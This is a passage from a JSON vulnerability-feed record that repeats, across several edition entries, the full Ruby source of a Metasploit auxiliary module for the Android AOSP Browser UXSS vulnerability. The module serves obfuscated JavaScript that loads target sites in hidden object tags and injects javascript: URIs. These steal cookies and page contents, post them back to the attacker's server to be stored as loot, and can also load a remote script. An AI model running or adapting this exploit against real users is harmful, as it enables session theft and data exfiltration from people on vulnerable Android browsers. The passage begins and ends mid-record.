<<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T23:22:50", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T21:32:09", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T21:32:09", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T23:21:19", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T23:21:19", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T15:20:06", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T15:20:06", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T17:18:53", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T17:18:53", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T13:25:44", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T13:25:44", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T15:26:34", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n 